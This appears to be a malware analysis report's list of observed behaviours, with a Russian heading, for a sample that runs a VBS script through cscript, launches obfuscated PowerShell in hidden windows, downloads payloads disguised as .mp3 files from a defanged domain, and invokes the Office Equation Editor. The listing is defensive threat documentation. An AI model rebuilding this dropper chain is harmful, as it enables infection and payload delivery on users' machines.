Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\som.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\som.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $9603A8EA548DDCDC11F602CDDE7047CE7CDA7DC03A53A2B2E8DCF8B3A545=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,...
- %TEMP%\som.vbs
- http://ni##dis.com/a/Stub.mp3
- http://ni##dis.com/a/pay.mp3
- DNS ASK ni##dis.com
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\som.vbs AC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $9603A8EA548DDCDC11F602CDDE7047CE7CDA7DC03A53A2B2E8DCF8B3A545=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay